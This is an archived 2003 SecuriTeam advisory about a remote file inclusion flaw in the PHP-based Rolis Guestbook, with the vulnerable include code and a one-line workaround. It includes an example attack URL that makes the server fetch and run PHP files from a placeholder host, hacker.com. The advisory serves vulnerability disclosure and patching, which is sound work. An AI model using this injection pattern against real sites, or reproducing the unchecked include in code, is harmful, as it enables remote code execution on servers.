[UNIX] Rolis Guestbook Allows Code Injection
From: SecuriTeam (support_at_securiteam.com)
Date: 11/18/03
- Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in NetServe (Directory Traversal, Password Disclosure)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 18 Nov 2003 13:52:51 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Rolis Guestbook Allows Code Injection
------------------------------------------------------------------------
SUMMARY
<http://www.roli.at> Rolis Guestbook is "a simple to use PHP based
Guestbook", a vulnerability in the product allows remote attackers to
insert malicious PHP code into the product, allowing remote attackers to
execute arbitrary code.
DETAILS
Vulnerable code:
Because the script:
<?php
include ($path . "data.inc.php");
include ($path . "header.inc.php");
include($path . "connection_data.inc.php");
[ scip ]
Does not verify that $path arrives from the user, nor does it filter it
for arbitrary values, requesting such a URL as:
http://www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/
Will cause the program to download the following files,
http://hacker.com/data.inc.php, http://hacker.com/header.inc.php, and
http://hacker.com/connection_data.inc.php from the remote server, and
execute the code inside them.
Workaround:
Edit insert.inc.php:
<?php
include ("path.inc.php"); <-- insert this line
include ($path . "data.inc.php");
...
ADDITIONAL INFORMATION
The information has been provided by <mailto:r00t@rsteam.ru> r00t.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in NetServe (Directory Traversal, Password Disclosure)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
